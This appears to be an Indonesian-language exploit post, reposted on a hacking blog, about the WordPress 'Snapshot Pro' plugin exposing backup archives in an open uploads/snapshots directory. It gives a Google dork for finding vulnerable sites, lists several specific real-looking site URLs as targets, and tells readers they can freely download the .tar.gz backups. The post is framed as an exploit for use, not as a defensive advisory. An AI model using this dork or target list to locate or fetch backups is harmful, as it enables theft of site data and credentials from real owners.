WordPress 'Snapshot Pro' Plugin Paparan Backup File untuk Kontrol sah

# WordPress 'Snapshot Pro' Plugin Paparan Backup File untuk Kontrol sah
# CWE: cwe-530
# Risiko: Tinggi
# Penulis: Hugo Santiago dos Santos
# Hubungi: hugo.s@linuxmail.org
# Tanggal: 15/05/2015
# Penjual Homepage: https://premium.wpmudev.org/project/snapshot/
# Google Dork: "Index of" + / wp-content / uploads / snapshots /

# PoC:

http://trapshootingonXline.com/wp-content/uploads/snapshots/"RANDOM DIR "/" NAMA CADANGAN "
http://trapshootingoXnline.com/wp-content/uploads/snapshots/
http://forsythchurcXhofchrist.net/wp-content/uploads/snapshots/
http://www.bardoXlatry.com/wp-content/uploads/snapshots/4ljtmn0hfg0kvmifobvrfdsdv2/

# Xploit:

Setelah menggunakan Dork Google ("Index of" + / wp-content / uploads / snapshots /), kita dapat mengakses direktori backup secara bebas ("/ wp-content / uploads / snapshots /"), dan semua backup akan berada di sana untuk mengunduh (Compress .tar.gz).

Dork Exploitations Hacking Vuln

Oktober 10, 2015 • 0 komentar

T.I Sniper

Backlink dengan Google Dork Seo

Cara Dapat Backlink dengan Google Dork

Download File ISO Windows 11 Dan Bootable USB Rufus

Cara Dapat Backlink Edu Gratis

SBS opening Fix Autosultan

WordPress 'Snapshot Pro' Plugin Paparan Backup File untuk Kontrol sah